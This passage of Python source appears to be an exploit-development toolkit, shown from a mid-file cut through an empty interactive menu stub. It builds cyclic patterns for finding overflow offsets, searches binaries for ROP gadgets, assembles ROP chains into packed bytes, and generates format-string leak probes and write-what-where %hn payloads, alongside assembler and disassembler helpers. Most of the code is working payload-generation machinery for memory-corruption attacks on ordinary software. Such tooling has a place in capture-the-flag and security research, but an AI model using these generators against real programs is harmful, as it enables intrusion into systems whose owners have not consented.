return {
|
|
'pattern': pattern,
|
|
'hex': pattern_bytes.hex(),
|
|
'length': len(pattern),
|
|
}
|
|
|
|
def _debruijn_pattern(self, length):
|
|
"""Generate De Bruijn sequence for cyclic pattern."""
|
|
uppers = string.ascii_uppercase
|
|
lowers = string.ascii_lowercase
|
|
digits = string.digits
|
|
|
|
pattern = []
|
|
for u in uppers:
|
|
for l in lowers:
|
|
for d in digits:
|
|
pattern.append(u + l + d)
|
|
if len(''.join(pattern)) >= length:
|
|
return ''.join(pattern)[:length]
|
|
return ''.join(pattern)[:length]
|
|
|
|
def find_pattern_offset(self, value, length=20000):
|
|
"""Find the offset of a value within a cyclic pattern.
|
|
|
|
Args:
|
|
value: hex string (e.g. '41326241'), integer, or raw string
|
|
length: pattern length to search within
|
|
|
|
Returns:
|
|
dict with offset and matching details
|
|
"""
|
|
pattern = self._debruijn_pattern(min(int(length), 20280))
|
|
|
|
# Try to interpret value
|
|
search_strings = []
|
|
|
|
if isinstance(value, str):
|
|
value = value.strip()
|
|
|
|
# Hex: 0x prefix or pure hex
|
|
if value.startswith('0x') or value.startswith('0X'):
|
|
hex_str = value[2:]
|
|
if len(hex_str) % 2 != 0:
|
|
hex_str = '0' + hex_str
|
|
try:
|
|
raw = bytes.fromhex(hex_str)
|
|
search_strings.append(raw.decode('ascii', errors='replace'))
|
|
# Also try reversed (little-endian)
|
|
search_strings.append(raw[::-1].decode('ascii', errors='replace'))
|
|
except (ValueError, UnicodeDecodeError):
|
|
pass
|
|
elif all(c in '0123456789abcdefABCDEF' for c in value) and len(value) >= 4:
|
|
# Pure hex without prefix
|
|
try:
|
|
raw = bytes.fromhex(value)
|
|
search_strings.append(raw.decode('ascii', errors='replace'))
|
|
search_strings.append(raw[::-1].decode('ascii', errors='replace'))
|
|
except (ValueError, UnicodeDecodeError):
|
|
pass
|
|
|
|
# Integer
|
|
try:
|
|
int_val = int(value, 0)
|
|
for width in (4, 8):
|
|
try:
|
|
packed_le = struct.pack(f'<{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1))
|
|
search_strings.append(packed_le.decode('ascii', errors='replace'))
|
|
packed_be = struct.pack(f'>{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1))
|
|
search_strings.append(packed_be.decode('ascii', errors='replace'))
|
|
except (struct.error, OverflowError):
|
|
pass
|
|
except (ValueError, OverflowError):
|
|
pass
|
|
|
|
# Direct string search
|
|
search_strings.append(value)
|
|
|
|
elif isinstance(value, int):
|
|
for width in (4, 8):
|
|
try:
|
|
packed = struct.pack(f'<{"I" if width == 4 else "Q"}', value & (2**(width*8)-1))
|
|
search_strings.append(packed.decode('ascii', errors='replace'))
|
|
except (struct.error, OverflowError):
|
|
pass
|
|
|
|
# Search
|
|
for needle in search_strings:
|
|
offset = pattern.find(needle)
|
|
if offset != -1:
|
|
return {
|
|
'offset': offset,
|
|
'value': value if isinstance(value, str) else hex(value),
|
|
'matched': needle,
|
|
'matched_hex': needle.encode('ascii', errors='replace').hex(),
|
|
'endian': 'little-endian' if search_strings.index(needle) % 2 == 1 else 'big-endian',
|
|
'pattern_length': len(pattern),
|
|
}
|
|
|
|
return {
|
|
'offset': -1,
|
|
'error': f'Value {value} not found in pattern of length {len(pattern)}',
|
|
'value': str(value),
|
|
'pattern_length': len(pattern),
|
|
}
|
|
|
|
# -----------------------------------------------------------------------
|
|
# ROP Gadget Finding
|
|
# -----------------------------------------------------------------------
|
|
|
|
def find_rop_gadgets(self, binary_path, gadget_type=None, max_gadgets=200):
    """Search a binary for ROP gadgets with the first available backend.

    Args:
        binary_path: path to ELF/PE binary
        gadget_type: None (all), pop_ret, xchg, mov, syscall, jmp_esp, call_reg
        max_gadgets: maximum gadgets to return

    Returns:
        The chosen backend's result dict, or {'error': ...} when the file is
        missing or no backend tool can be located.
    """
    if not os.path.isfile(binary_path):
        return {'error': f'File not found: {binary_path}'}

    # Backends in order of preference: ropper, then ROPgadget, then the
    # objdump + regex fallback. Each is probed only if the previous one
    # was not found.
    backends = (
        ('ropper', '_find_gadgets_ropper'),
        ('ROPgadget', '_find_gadgets_ropgadget'),
        ('objdump', '_find_gadgets_objdump'),
    )
    for tool_name, handler_name in backends:
        if find_tool(tool_name):
            handler = getattr(self, handler_name)
            return handler(binary_path, gadget_type, max_gadgets)

    return {'error': 'No disassembler found. Install ropper, ROPgadget, or objdump.'}
|
|
|
|
def _find_gadgets_ropper(self, binary_path, gadget_type, max_gadgets):
    """Find gadgets by running ropper and parsing its text output.

    Args:
        binary_path: binary passed to ``ropper -f``
        gadget_type: optional gadget category; known categories are mapped
            to a ropper ``--search`` term, anything else is passed through
        max_gadgets: stop after collecting this many gadgets

    Returns:
        dict with 'binary', 'tool', 'count' and 'gadgets' (address, gadget
        text, and the type assigned by ``self._classify_gadget``), or
        {'error': ...} when ropper is missing, cannot be started or times out.
    """
    ropper = find_tool('ropper')
    if not ropper:
        # Without this guard a missing tool put None into the argv list and
        # subprocess raised an uncaught TypeError.
        return {'error': 'ropper execution failed'}

    cmd = [ropper, '-f', binary_path, '--nocolor']
    if gadget_type:
        search_map = {
            'pop_ret': 'pop',
            'xchg': 'xchg',
            'mov': 'mov',
            'syscall': 'syscall',
            'jmp_esp': 'jmp esp',
            'call_reg': 'call',
        }
        search_term = search_map.get(gadget_type, gadget_type)
        cmd.extend(['--search', search_term])

    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
    except (subprocess.TimeoutExpired, OSError):
        # OSError covers FileNotFoundError as well as PermissionError and
        # other launch failures.
        return {'error': 'ropper execution failed'}

    # Parse: 0xaddress: instruction; instruction; ret;
    gadget_re = re.compile(r'(0x[0-9a-fA-F]+):\s+(.*)')
    gadgets = []
    for line in result.stdout.strip().split('\n'):
        line = line.strip()
        # Skip blank lines, separators, section headers and log lines
        if not line or line.startswith(('=', 'Gadgets', '[')):
            continue
        match = gadget_re.match(line)
        if match:
            addr = match.group(1)
            instr = match.group(2).strip().rstrip(';').strip()
            gtype = self._classify_gadget(instr)
            gadgets.append({
                'address': addr,
                'gadget': instr,
                'type': gtype,
            })
            if len(gadgets) >= max_gadgets:
                break

    return {
        'binary': binary_path,
        'tool': 'ropper',
        'count': len(gadgets),
        'gadgets': gadgets,
    }
|
|
|
|
def _find_gadgets_ropgadget(self, binary_path, gadget_type, max_gadgets):
    """Find gadgets by running the external ``ROPgadget`` tool.

    Args:
        binary_path: path of the binary handed to ``ROPgadget --binary``.
        gadget_type: optional category; when set, only gadgets whose
            ``_classify_gadget`` label equals it are kept.
        max_gadgets: parsing stops once this many gadgets were collected.

    Returns:
        dict with ``binary``, ``tool``, ``count`` and ``gadgets`` keys, or
        ``{'error': ...}`` when ROPgadget could not be run.
    """
    ropgadget_path = find_tool('ROPgadget')
    if not ropgadget_path:
        # Guard direct calls: None in argv would raise TypeError.
        return {'error': 'ROPgadget execution failed'}

    try:
        result = subprocess.run(
            [ropgadget_path, '--binary', binary_path],
            capture_output=True, text=True, timeout=60,
        )
    except (subprocess.TimeoutExpired, OSError):
        # OSError also covers PermissionError and similar launch failures,
        # not just a missing executable.
        return {'error': 'ROPgadget execution failed'}

    # Expected line shape: 0xaddress : instruction ; instruction ; ret
    line_re = re.compile(r'(0x[0-9a-fA-F]+)\s+:\s+(.*)')
    gadgets = []
    for raw in result.stdout.strip().split('\n'):
        match = line_re.match(raw.strip())
        if not match:
            continue
        instr = match.group(2).strip()
        gtype = self._classify_gadget(instr)
        if gadget_type and gtype != gadget_type:
            continue
        gadgets.append({
            'address': match.group(1),
            'gadget': instr,
            'type': gtype,
        })
        if len(gadgets) >= max_gadgets:
            break

    return {
        'binary': binary_path,
        'tool': 'ROPgadget',
        'count': len(gadgets),
        'gadgets': gadgets,
    }
|
|
|
|
def _find_gadgets_objdump(self, binary_path, gadget_type, max_gadgets):
    """Find gadgets from an ``objdump -d -M intel`` listing.

    Every instruction ending in ``ret``, ``syscall`` or ``int 0x80`` closes a
    gadget. For each such instruction, all suffixes of the instruction run
    made of it and the instruction lines found in the five listing lines
    before it are reported as candidate gadgets.

    Args:
        binary_path: path of the binary to disassemble.
        gadget_type: optional category; when set, only gadgets whose
            ``_classify_gadget`` label equals it are kept.
        max_gadgets: collection stops once this many gadgets were gathered
            (counted before de-duplication).

    Returns:
        dict with ``binary``, ``tool``, ``count`` and ``gadgets`` keys, or
        ``{'error': ...}`` when objdump could not be run.
    """
    objdump = find_tool('objdump')
    if not objdump:
        # Guard direct calls: None in argv would raise TypeError.
        return {'error': 'objdump execution failed'}

    try:
        result = subprocess.run(
            [objdump, '-d', '-M', 'intel', binary_path],
            capture_output=True, text=True, timeout=120,
        )
    except (subprocess.TimeoutExpired, OSError):
        # OSError also covers PermissionError and similar launch failures.
        return {'error': 'objdump execution failed'}

    # "address:  hex bytes  instruction text"
    instr_re = re.compile(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)')
    ending_res = (
        re.compile(r'ret\s*$'),
        re.compile(r'syscall\s*$'),
        re.compile(r'int\s+0x80\s*$'),
    )

    # Parse each listing line once. Non-instruction lines (labels, blanks,
    # section headers) become None so listing positions are preserved.
    parsed = []
    for raw in result.stdout.split('\n'):
        m = instr_re.match(raw.strip())
        parsed.append((m.group(1), m.group(3).strip()) if m else None)

    gadgets = []
    for i, entry in enumerate(parsed):
        if len(gadgets) >= max_gadgets:
            break
        if entry is None or not any(r.search(entry[1]) for r in ending_res):
            continue

        # Instructions in the look-back window, each paired with its own
        # address. Using the pair avoids attributing a gadget to the wrong
        # address when the window contains non-instruction lines.
        window = [p for p in parsed[max(0, i - 5):i + 1] if p is not None]

        for start in range(len(window)):
            gadget_str = ' ; '.join(text for _, text in window[start:])
            gtype = self._classify_gadget(gadget_str)
            if gadget_type and gtype != gadget_type:
                continue
            gadgets.append({
                'address': f'0x{window[start][0]}',
                'gadget': gadget_str,
                'type': gtype,
            })
            if len(gadgets) >= max_gadgets:
                break

    # Deduplicate while keeping first-seen order.
    seen = set()
    unique = []
    for g in gadgets:
        key = (g['address'], g['gadget'])
        if key not in seen:
            seen.add(key)
            unique.append(g)

    return {
        'binary': binary_path,
        'tool': 'objdump',
        'count': len(unique),
        'gadgets': unique,
    }
|
|
|
|
def _classify_gadget(self, gadget_str):
|
|
"""Classify a gadget by its instruction pattern."""
|
|
g = gadget_str.lower()
|
|
if re.search(r'pop\s+\w+.*ret', g):
|
|
return 'pop_ret'
|
|
if 'xchg' in g:
|
|
return 'xchg'
|
|
if 'syscall' in g or 'int 0x80' in g:
|
|
return 'syscall'
|
|
if re.search(r'jmp\s+(esp|rsp)', g):
|
|
return 'jmp_esp'
|
|
if re.search(r'call\s+(eax|ebx|ecx|edx|esi|edi|rax|rbx|rcx|rdx|rsi|rdi|r\d+)', g):
|
|
return 'call_reg'
|
|
if 'mov' in g:
|
|
return 'mov'
|
|
if 'ret' in g:
|
|
return 'ret'
|
|
return 'other'
|
|
|
|
# -----------------------------------------------------------------------
|
|
# ROP Chain Builder
|
|
# -----------------------------------------------------------------------
|
|
|
|
def build_rop_chain(self, gadgets, chain_spec, word_size=None):
    """Assemble a ROP chain from gadgets and a chain specification.

    Args:
        gadgets: list of gadget dicts (address, gadget, type)
        chain_spec: list of dicts describing the desired chain:
            [
                {'gadget_type': 'pop_ret', 'register': 'rdi', 'value': '0x...'},
                {'gadget_type': 'pop_ret', 'register': 'rsi', 'value': '0x...'},
                {'gadget_type': 'syscall'},
                ...
            ]
        word_size: 4 or 8 to force the width of every chain slot. ``None``
            (default) selects 8 when any selected gadget address or value
            exceeds 32 bits, or when a selected gadget or requested register
            names an x86-64 register (rax..rdi, rbp, rsp, rip); otherwise 4.

    Returns:
        dict with chain bytes, addresses, and debug info, or
        ``{'error': ...}`` when the input cannot be used.
    """
    if not gadgets:
        return {'error': 'No gadgets provided'}
    if not chain_spec:
        return {'error': 'No chain specification provided'}
    if word_size not in (None, 4, 8):
        return {'error': 'word_size must be 4 or 8'}

    # Index gadgets by type.
    by_type = {}
    for g in gadgets:
        by_type.setdefault(g.get('type', 'other'), []).append(g)

    # Register names that only exist in 64-bit x86 code. r8-r15 are left out
    # on purpose because the same spellings are 32-bit ARM registers.
    reg64_re = re.compile(r'\br(?:[abcd]x|[sd]i|[sb]p|ip)\b')

    # Pass 1: resolve each step to a gadget. The slot width must be known
    # for the whole chain before any byte is packed, otherwise a chain could
    # mix 4- and 8-byte slots.
    plan = []  # either a debug string (miss) or (gadget, addr_int, val_int)
    wide = False
    for step in chain_spec:
        gtype = step.get('gadget_type', step.get('type', 'pop_ret'))
        register = (step.get('register') or '').lower()

        candidates = by_type.get(gtype, [])
        if register:
            # Prefer gadgets mentioning the register; fall back to any gadget
            # of the requested type when none does.
            reg_candidates = [g for g in candidates if register in g['gadget'].lower()]
            if reg_candidates:
                candidates = reg_candidates

        if not candidates:
            plan.append(f'[!] No gadget found for: {gtype} {register}')
            continue

        gadget = candidates[0]  # Use first match
        try:
            addr_int = int(gadget['address'], 16)
        except (TypeError, ValueError):
            return {'error': f'Invalid gadget address: {gadget["address"]!r}'}

        val_int = None
        if gtype == 'pop_ret' and 'value' in step:
            value = step['value']
            try:
                val_int = int(value, 0) if isinstance(value, str) else int(value)
            except (TypeError, ValueError):
                return {'error': f'Invalid value in chain step: {value!r}'}

        if (addr_int > 0xFFFFFFFF
                or (val_int is not None and val_int > 0xFFFFFFFF)
                or reg64_re.search(register)
                or reg64_re.search(gadget['gadget'].lower())):
            wide = True
        plan.append((gadget, addr_int, val_int))

    if word_size is None:
        word_size = 8 if wide else 4
    fmt = '<Q' if word_size == 8 else '<I'
    mask = (1 << (8 * word_size)) - 1

    # Pass 2: pack every slot with the single chosen width.
    chain_addrs = []
    parts = []
    debug_lines = []
    for item in plan:
        if isinstance(item, str):
            debug_lines.append(item)
            continue
        gadget, addr_int, val_int = item
        if not 0 <= addr_int <= mask:
            return {'error': f'Gadget address {gadget["address"]} does not fit in {word_size} bytes'}
        parts.append(struct.pack(fmt, addr_int))
        chain_addrs.append(gadget['address'])
        debug_lines.append(f'[+] {gadget["address"]}: {gadget["gadget"]}')

        # For pop_ret steps the popped value follows the gadget address.
        if val_int is not None:
            parts.append(struct.pack(fmt, val_int & mask))
            debug_lines.append(f' => 0x{val_int:x}')

    chain_bytes = b''.join(parts)
    return {
        'chain_hex': chain_bytes.hex(),
        'chain_length': len(chain_bytes),
        'addresses': chain_addrs,
        'steps': len(chain_spec),
        'matched': len(chain_addrs),
        'word_size': word_size,
        'debug': '\n'.join(debug_lines),
        'python': self._chain_to_python(chain_bytes, word_size),
    }


def _chain_to_python(self, chain_bytes, width=None):
    """Convert chain bytes to Python struct.pack() calls.

    Args:
        chain_bytes: packed chain.
        width: slot width in bytes (4 or 8). When omitted, the width is
            guessed from the total length (8 if the length is a multiple of
            8 and above 4, else 4). That guess cannot tell an even number of
            4-byte slots from 8-byte slots, so callers that know the width
            should pass it.

    Returns:
        Source text that rebuilds the chain one slot per line. A trailing
        partial slot is not emitted.
    """
    if width not in (4, 8):
        width = 8 if len(chain_bytes) > 4 and len(chain_bytes) % 8 == 0 else 4
    fmt = '<Q' if width == 8 else '<I'

    lines = ['from struct import pack', '', 'chain = b""']
    for pos in range(0, len(chain_bytes) - width + 1, width):
        val = struct.unpack_from(fmt, chain_bytes, pos)[0]
        lines.append(f'chain += pack("{fmt}", 0x{val:x})')
    return '\n'.join(lines)
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Format String Exploitation
|
|
# -----------------------------------------------------------------------
|
|
|
|
def format_string_offset(self, binary_path=None, test_count=20):
    """Build format-string probe payloads used to locate the input offset.

    Args:
        binary_path: accepted for UI consistency; not used.
        test_count: number of positional probes per payload, capped at 100
            (the string probe is further capped at 10).

    Returns:
        dict with the named ``payloads``, the effective ``test_count`` and a
        usage ``note``.
    """
    test_count = min(int(test_count), 100)

    def probes(spec, separator, count):
        # Positional directives %1$<spec> .. %count$<spec>, joined by separator.
        return separator.join(f'%{idx}${spec}' for idx in range(1, count + 1))

    pointer_leak = {
        'payload': probes('p', '.', test_count),
        'description': 'Leak stack pointers at each offset',
    }
    hex_leak = {
        'payload': probes('x', '.', test_count),
        'description': 'Leak stack values as hex (32-bit)',
    }
    long_hex_leak = {
        'payload': probes('lx', '.', test_count),
        'description': 'Leak stack values as long hex (64-bit)',
    }
    string_probe = {
        'payload': probes('s', '|', min(test_count, 10)),
        'description': 'Attempt to read strings (may crash — use with caution)',
    }
    marker_test = {
        'payload': 'AAAA' + probes('x', '.', test_count),
        'description': 'Find AAAA (0x41414141) marker on stack to determine input offset',
    }

    return {
        'payloads': {
            'pointer_leak': pointer_leak,
            'hex_leak': hex_leak,
            'long_hex_leak': long_hex_leak,
            'string_probe': string_probe,
            'marker_test': marker_test,
        },
        'test_count': test_count,
        'note': 'Feed each payload to the vulnerable printf-like function. '
                'The offset where your marker appears is your format string offset.',
    }
|
|
|
|
def format_string_write(self, address, value, offset):
    """Generate a write-what-where format string payload.

    The payload text is the hex encoding of the packed target addresses
    followed by ``%Nc`` padding and ``%K$hn`` directives. Directives are
    emitted in ascending order of the 16-bit word they write, so each
    padding step only ever counts upwards (modulo 0x10000).

    Args:
        address: target address to write to (hex string or int)
        value: value to write (hex string or int)
        offset: format string offset where input appears on stack

    Returns:
        dict with 32-bit and 64-bit payloads, or ``{'error': ...}`` when the
        address cannot be packed into 8 bytes. When the address does not fit
        in 32 bits, ``payload_32bit`` carries an empty payload and an
        explanatory description instead of raising.
    """
    if isinstance(address, str):
        address = int(address, 0)
    if isinstance(value, str):
        value = int(value, 0)
    offset = int(offset)

    # The last 16-bit write targets address + 6 and must still pack as '<Q'.
    if address < 0 or address + 6 > 0xFFFFFFFFFFFFFFFF:
        return {'error': f'Address out of range: {address:#x}'}

    def build(word_count, pack_fmt):
        # Slot offset + i holds address + 2*i. Addresses are therefore
        # emitted in positional order, independent of the order in which
        # the directives are sorted below.
        packed = [struct.pack(pack_fmt, address + 2 * i) for i in range(word_count)]
        words = [(value >> (16 * i)) & 0xFFFF for i in range(word_count)]

        # Assumes the hex-encoded addresses are delivered as raw bytes at the
        # start of the format string, so they count as already-printed
        # characters when the first %hn executes.
        # NOTE(review): addresses containing 0x00 bytes would end a C string
        # before the directives are reached; confirm how consumers lay out
        # the final buffer for such targets.
        printed = sum(len(p) for p in packed)

        parts = []
        for i in sorted(range(word_count), key=words.__getitem__):
            pad = (words[i] - printed) % 0x10000
            if pad > 0:
                parts.append(f'%{pad}c')
            parts.append(f'%{offset + i}$hn')
            printed = words[i]
        return ''.join(p.hex() for p in packed) + ''.join(parts)

    results = {}

    # 32-bit write (write 4 bytes as two %hn writes)
    if address + 2 <= 0xFFFFFFFF:
        results['payload_32bit'] = {
            'payload': build(2, '<I'),
            'description': f'Write 0x{value:08x} to 0x{address:08x} (32-bit, two %hn writes)',
            'addresses': f'0x{address:08x}, 0x{address + 2:08x}',
        }
    else:
        # struct.pack('<I', ...) cannot represent this target; skip the
        # 32-bit form rather than failing the whole call.
        results['payload_32bit'] = {
            'payload': '',
            'description': f'Skipped: 0x{address:x} does not fit in a 32-bit address',
            'addresses': '',
        }

    # 64-bit write (write 8 bytes as four %hn writes)
    results['payload_64bit'] = {
        'payload': build(4, '<Q'),
        'description': f'Write 0x{value:016x} to 0x{address:016x} (64-bit, four %hn writes)',
    }

    return results
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Assembly / Disassembly
|
|
# -----------------------------------------------------------------------
|
|
|
|
def assemble(self, code, arch='x64'):
    """Assemble assembly code to machine code bytes.

    NASM is used for x86-family targets when it is installed; otherwise, and
    always for ARM targets, keystone-engine is tried.

    Args:
        code: assembly source (NASM syntax)
        arch: x86, x64, arm

    Returns:
        dict with hex bytes, raw length, and related encodings, or
        ``{'error': ...}``.
    """
    if not code or not code.strip():
        return {'error': 'No assembly code provided'}

    arch = (arch or 'x64').lower().strip()

    # NASM only emits x86-family code. Sending ARM source through it would
    # assemble (or fail) as x86-64, so ARM always goes to keystone.
    if not arch.startswith(('arm', 'aarch')):
        nasm = find_tool('nasm')
        if nasm:
            # _assemble_nasm produces a flat binary with `nasm -f bin` and
            # never invokes objcopy, so a missing objcopy must not disable
            # the NASM path. It is still looked up to keep the helper's
            # signature satisfied.
            return self._assemble_nasm(code, arch, nasm, find_tool('objcopy'))

    # Try keystone-engine
    try:
        import keystone  # noqa: F401 - availability probe
        return self._assemble_keystone(code, arch)
    except ImportError:
        pass

    return {
        'error': 'No assembler available. Install nasm + objcopy, or pip install keystone-engine.'
    }
|
|
|
|
def _assemble_nasm(self, code, arch, nasm_path, objcopy_path):
|
|
"""Assemble using NASM."""
|
|
# Set BITS directive based on arch
|
|
bits_map = {'x86': '32', 'x64': '64', 'i386': '32', 'amd64': '64'}
|
|
bits = bits_map.get(arch, '64')
|
|
|
|
# Prepend BITS directive if not already present
|
|
if 'bits' not in code.lower():
|
|
code = f'BITS {bits}\n{code}'
|
|
|
|
with tempfile.NamedTemporaryFile(suffix='.asm', mode='w', delete=False) as f:
|
|
f.write(code)
|
|
asm_path = f.name
|
|
|
|
obj_path = asm_path.replace('.asm', '.o')
|
|
bin_path = asm_path.replace('.asm', '.bin')
|
|
|
|
try:
|
|
# Assemble
|
|
result = subprocess.run(
|
|
[nasm_path, '-f', 'bin', '-o', bin_path, asm_path],
|
|
capture_output=True, text=True, timeout=10
|
|
)
|
|
if result.returncode != 0:
|
|
return {'error': f'NASM error: {result.stderr.strip()}'}
|
|
|
|
# Read binary output
|
|
with open(bin_path, 'rb') as bf:
|
|
machine_code = bf.read()
|
|
|
|
return {
|
|
'hex': machine_code.hex(),
|
|
'bytes': list(machine_code),
|
|
'length': len(machine_code),
|
|
'arch': arch,
|
|
'c_array': ', '.join(f'0x{b:02x}' for b in machine_code),
|
|
'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"',
|
|
}
|
|
|
|
except subprocess.TimeoutExpired:
|
|
return {'error': 'Assembly timed out'}
|
|
finally:
|
|
for p in (asm_path, obj_path, bin_path):
|
|
try:
|
|
os.unlink(p)
|
|
except OSError:
|
|
pass
|
|
|
|
def _assemble_keystone(self, code, arch):
    """Assemble *code* with keystone-engine.

    Args:
        code: assembly source text.
        arch: 'x86', 'x64' or 'arm'; any other value falls back to x86-64.

    Returns:
        dict with ``hex``, ``bytes``, ``length``, ``arch``, ``instructions``,
        ``c_array`` and ``python`` keys, or ``{'error': ...}``.
    """
    import keystone

    arch_map = {
        'x86': (keystone.KS_ARCH_X86, keystone.KS_MODE_32),
        'x64': (keystone.KS_ARCH_X86, keystone.KS_MODE_64),
        'arm': (keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM),
    }
    ks_arch, ks_mode = arch_map.get(arch, (keystone.KS_ARCH_X86, keystone.KS_MODE_64))

    try:
        ks = keystone.Ks(ks_arch, ks_mode)
        encoding, count = ks.asm(code)
    except keystone.KsError as e:
        return {'error': f'Keystone error: {e}'}

    # The Python binding returns (None, 0) when no statement was assembled
    # (for example, source holding only comments); bytes(None) would raise.
    if encoding is None:
        return {'error': 'Keystone error: no instructions assembled'}

    machine_code = bytes(encoding)
    return {
        'hex': machine_code.hex(),
        'bytes': list(machine_code),
        'length': len(machine_code),
        'arch': arch,
        'instructions': count,
        'c_array': ', '.join(f'0x{b:02x}' for b in machine_code),
        'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"',
    }
|
|
|
|
def disassemble(self, data, arch='x64', offset=0):
    """Turn machine code into an assembly listing.

    Back ends are tried in order: capstone, then objdump, then a plain hex
    dump.

    Args:
        data: raw bytes, or a hex string (spaces and ``\\x`` prefixes are
            stripped before decoding).
        arch: x86, x64, arm
        offset: base address of the first byte.

    Returns:
        dict with the disassembly listing, or ``{'error': ...}`` for invalid
        or empty input.
    """
    if isinstance(data, str):
        hex_text = data.strip().replace(' ', '').replace('\\x', '')
        try:
            data = bytes.fromhex(hex_text)
        except ValueError:
            return {'error': 'Invalid hex data'}

    if not data:
        return {'error': 'No data to disassemble'}

    arch = arch.lower().strip()
    offset = int(offset)

    # Preferred back end: capstone, when importable.
    try:
        import capstone  # noqa: F401 - availability probe
        return self._disasm_capstone(data, arch, offset)
    except ImportError:
        pass

    # Next: objdump if installed, else fall back to a byte listing.
    if find_tool('objdump'):
        return self._disasm_objdump(data, arch, offset)
    return self._disasm_basic(data, arch, offset)
|
|
|
|
def _disasm_capstone(self, data, arch, offset):
    """Decode *data* with capstone, numbering addresses from *offset*.

    Returns a dict holding the per-instruction records, a formatted text
    listing, the instruction count, and bookkeeping fields.
    """
    import capstone

    modes = {
        'x86': (capstone.CS_ARCH_X86, capstone.CS_MODE_32),
        'x64': (capstone.CS_ARCH_X86, capstone.CS_MODE_64),
        'arm': (capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM),
    }
    # Unknown architecture names are treated as x86-64.
    fallback = (capstone.CS_ARCH_X86, capstone.CS_MODE_64)
    cs_arch, cs_mode = modes.get(arch, fallback)

    engine = capstone.Cs(cs_arch, cs_mode)
    engine.detail = False

    def describe(addr, size, mnemonic, op_str):
        # Reported addresses include the base offset; subtract it to index
        # back into the input buffer.
        begin = addr - offset
        return {
            'address': f'0x{addr:08x}',
            'bytes': data[begin:begin + size].hex(),
            'mnemonic': mnemonic,
            'operands': op_str,
            'text': f'{mnemonic} {op_str}'.strip(),
        }

    instructions = [describe(*fields) for fields in engine.disasm_lite(data, offset)]

    rows = []
    for record in instructions:
        rows.append(f'{record["address"]}: {record["bytes"]:<20s} {record["text"]}')

    return {
        'instructions': instructions,
        'listing': '\n'.join(rows),
        'count': len(instructions),
        'arch': arch,
        'tool': 'capstone',
        'data_length': len(data),
    }
|
|
|
|
def _disasm_objdump(self, data, arch, offset):
    """Disassemble raw bytes by writing them to a temp file and running objdump.

    Args:
        data: machine code bytes.
        arch: 'x86', 'x64' or 'arm'; any other value falls back to x86-64.
        offset: base address, passed to objdump as ``--adjust-vma``.

    Returns:
        dict with ``instructions``, ``listing``, ``count``, ``arch``,
        ``tool`` and ``data_length`` keys, or ``{'error': ...}``.
    """
    objdump = find_tool('objdump')
    if not objdump:
        # Guard direct calls: None in argv would raise TypeError.
        return {'error': 'objdump not available'}

    arch_map = {'x86': 'i386', 'x64': 'i386:x86-64', 'arm': 'arm'}
    obj_arch = arch_map.get(arch, 'i386:x86-64')

    with tempfile.NamedTemporaryFile(suffix='.bin', delete=False) as f:
        f.write(data)
        bin_path = f.name

    try:
        result = subprocess.run(
            [objdump, '-D', '-b', 'binary', '-m', obj_arch,
             '-M', 'intel', '--adjust-vma', str(offset), bin_path],
            capture_output=True, text=True, timeout=10
        )
    except subprocess.TimeoutExpired:
        return {'error': 'Disassembly timed out'}
    except OSError as exc:
        # Launch failures (missing or non-executable tool) are reported as
        # an error result instead of escaping as an exception.
        return {'error': f'objdump execution failed: {exc}'}
    finally:
        # The temp file is only needed while objdump runs.
        try:
            os.unlink(bin_path)
        except OSError:
            pass

    # "address:  hex bytes  instruction text"
    line_re = re.compile(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)')
    instructions = []
    for line in result.stdout.strip().split('\n'):
        match = line_re.match(line)
        if match:
            instructions.append({
                'address': f'0x{match.group(1)}',
                'bytes': match.group(2).strip().replace(' ', ''),
                'text': match.group(3).strip(),
            })

    listing = '\n'.join(
        f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}'
        for i in instructions
    )

    return {
        'instructions': instructions,
        'listing': listing,
        'count': len(instructions),
        'arch': arch,
        'tool': 'objdump',
        'data_length': len(data),
    }
|
|
|
|
def _disasm_basic(self, data, arch, offset):
|
|
"""Basic hex dump when no disassembler is available."""
|
|
listing_lines = []
|
|
for i in range(0, len(data), 16):
|
|
chunk = data[i:i + 16]
|
|
addr = offset + i
|
|
hex_part = ' '.join(f'{b:02x}' for b in chunk)
|
|
ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
|
|
listing_lines.append(f'0x{addr:08x}: {hex_part:<48s} {ascii_part}')
|
|
|
|
return {
|
|
'instructions': [],
|
|
'listing': '\n'.join(listing_lines),
|
|
'count': 0,
|
|
'arch': arch,
|
|
'tool': 'hex_dump (no disassembler available)',
|
|
'data_length': len(data),
|
|
'note': 'Install capstone or objdump for proper disassembly.',
|
|
}
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Hex Dump
|
|
# -----------------------------------------------------------------------
|
|
|
|
def hex_dump(self, data, offset=0):
    """Format bytes as a hex dump with ASCII sidebar.

    Args:
        data: bytes or hex string (spaces and ``\\x`` prefixes are stripped
            before decoding)
        offset: starting address offset

    Returns:
        dict with formatted hex dump string, or
        ``{'error': 'Invalid hex data'}`` when a hex string cannot be
        decoded (same convention as ``disassemble``).
    """
    if isinstance(data, str):
        try:
            data = bytes.fromhex(data.replace(' ', '').replace('\\x', ''))
        except ValueError:
            return {'error': 'Invalid hex data'}

    lines = []
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        addr = offset + i
        # Left-justify to 48 columns so short final rows stay aligned.
        hex_part = f"{' '.join(f'{b:02x}' for b in chunk):<48s}"
        ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
        lines.append(f'{addr:08x} {hex_part} |{ascii_part}|')

    return {
        'dump': '\n'.join(lines),
        'length': len(data),
        'offset': offset,
    }
|
|
|
|
# -----------------------------------------------------------------------
|
|
# CLI interface
|
|
# -----------------------------------------------------------------------
|
|
|
|
|
|
def run():
    """Interactive menu loop for the exploit development toolkit.

    Redraws the menu on every pass, dispatches the chosen entry to its CLI
    helper, and returns when the user enters ``0``. Unknown choices simply
    redraw the menu.
    """
